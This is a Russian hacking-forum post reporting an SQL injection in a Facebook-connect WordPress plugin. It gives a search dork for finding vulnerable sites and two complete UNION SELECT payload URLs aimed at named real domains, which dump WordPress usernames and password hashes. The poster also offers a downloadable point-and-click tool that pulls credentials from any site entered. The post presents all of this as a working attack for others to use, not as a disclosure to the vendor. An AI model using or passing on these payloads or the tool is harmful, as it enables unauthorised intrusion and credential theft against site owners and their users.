16.07.2011, 15:52
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами:
8357366
Репутация:
6
|
|
Сообщение от z0mbyak
Доброго времени суток, ковырял тут водпресс и вот что наковырял)
Тип: SQL-Inj
Плагин: Хрен его знает как он называется точно, так как пасс не подобрал) но какой-то фейсбуковский)
Dork: inurl:"fbconnect_action=myhome"
Собственно PoC:
http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
или
http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
P.S. Вроде не боян, хотя с вордпрессом не работаю, поэтому не в курсе)
P.P.S В Google
Развлекайтесь)))
Набросал мини-прогу:
 Мечта всех! Кнопка "Взломать" теперь работает
 Инструкция:
Находим уязвимые сайт и вводим в прогу без http:// и без слешов(/)
Типа binaries.ru и получаем логин:пасс в Result
Скачать: _http://rghost.ru/14736221
|
|
|